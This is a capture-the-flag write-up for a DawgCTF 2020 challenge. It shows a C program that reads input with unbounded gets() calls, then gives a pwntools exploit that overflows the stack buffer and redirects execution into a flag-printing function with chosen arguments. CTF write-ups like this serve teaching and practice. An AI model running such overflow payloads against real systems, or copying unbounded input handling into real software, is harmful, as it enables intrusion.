The source code is given:
```c
#include "stdio.h"
#include "string.h"
#include "stdlib.h"

// gcc -m32 -fno-stack-protector -no-pie bof.c -o bof

void audition(int time, int room_num){
char* flag = "/bin/cat flag.txt";
if(time == 1200 && room_num == 366){
system(flag);
}
}

void get_audition_info(){
char name[50];
char song[50];
printf("What's your name?\n");
gets(name);
printf("What song will you be singing?\n");
gets(song);
}

void welcome(){
printf("Welcome to East High!\n");
printf("We're the Wildcats and getting ready for our spring musical\n");
printf("We're now accepting signups for auditions!\n");
}

int main(){
welcome();
get_audition_info();
return 0;
}
```

The two input are no bounded -> buffer overflow.
We can rop into `audition()` function injecting the 2 parameters in the stack since is 32 bit binary

Exploit:
```python
from pwn import *

e = ELF('./bof')

payload = (('A'*112).encode())
payload += p32(e.symbols['audition'])
payload += (("B"*4).encode())
payload += p32(0x4B0)
payload += p32(0x16E)

p = remote('ctf.umbccd.io', 4000)
#p = process('./bof')
print(p.recvuntil('?\n').decode())
p.sendline("A".encode())
print(p.recvuntil('?\n').decode())
p.sendline(payload)
p.interactive()
```

# FLAG
`DawgCTF{wh@t_teAm?}`

Original writeup (https://github.com/Internaut401/CTF_Writeup/blob/master/2020/DawgCTF/bof%20of%20the%20top.md).